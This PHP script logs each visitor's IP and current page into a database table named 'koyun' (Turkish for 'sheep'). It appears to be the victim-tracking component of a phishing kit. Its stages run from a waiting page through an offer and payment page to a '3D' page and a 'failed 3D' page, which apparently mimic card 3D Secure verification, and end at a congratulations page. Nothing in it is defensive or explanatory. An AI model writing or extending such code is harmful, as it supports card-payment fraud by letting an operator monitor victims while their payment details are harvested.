<?php 
include 'db.php';
if(empty($_SERVER['HTTP_CF_CONNECTING_IP'])){
	$_SERVER['HTTP_CF_CONNECTING_IP'] = $_SERVER['REMOTE_ADDR'];
}
$ip = $_SERVER['HTTP_CF_CONNECTING_IP'];

if(@$_GET['page'] == 'Bekleme'){
	$q = $db->prepare("UPDATE koyun SET now = :now WHERE ip = :ip");
	$q->bindValue(':now', 'Bekleme Sayfası');
	$q->bindParam(':ip', $ip);
	$q->execute();

}else if(@$_GET['page'] == 'Ana'){
	$q = $db->prepare("UPDATE koyun SET now = :now WHERE ip = :ip");
	$q->bindValue(':now', 'Ana Sayfa');
	$q->bindParam(':ip', $ip);
	$q->execute();
}else if(@$_GET['page'] == 'TeklifHaz'){
	$q = $db->prepare("UPDATE koyun SET now = :now WHERE ip = :ip");
	$q->bindValue(':now', 'Teklif Hazırlanıyor');
	$q->bindParam(':ip', $ip);
	$q->execute();
}else if(@$_GET['page'] == 'TeklifTam'){
	$q = $db->prepare("UPDATE koyun SET now = :now WHERE ip = :ip");
	$q->bindValue(':now', 'Teklif Sayfası');
	$q->bindParam(':ip', $ip);
	$q->execute();
}else if(@$_GET['page'] == 'Odeme'){
	$q = $db->prepare("UPDATE koyun SET now = :now WHERE ip = :ip");
	$q->bindValue(':now', 'Ödeme Sayfası');
	$q->bindParam(':ip', $ip);
	$q->execute();
}else if(@$_GET['page'] == '3d'){
	$q = $db->prepare("UPDATE koyun SET now = :now WHERE ip = :ip");
	$q->bindValue(':now', '3D Sayfası');
	$q->bindParam(':ip', $ip);
	$q->execute();
}else if(@$_GET['page'] == '3dh'){
	$q = $db->prepare("UPDATE koyun SET now = :now WHERE ip = :ip");
	$q->bindValue(':now', 'Hatalı 3D Sayfası');
	$q->bindParam(':ip', $ip);
	$q->execute();
}else if(@$_GET['page'] == 'Tebrik'){
	$q = $db->prepare("UPDATE koyun SET now = :now WHERE ip = :ip");
	$q->bindValue(':now', 'Tebrik Sayfası');
	$q->bindParam(':ip', $ip);
	$q->execute();
}else if(@$_GET['page'] == 'Priv'){
	$q = $db->prepare("UPDATE koyun SET now = :now WHERE ip = :ip");
	$q->bindValue(':now', 'Özel Sayfa');
	$q->bindParam(':ip', $ip);
	$q->execute();
}
?>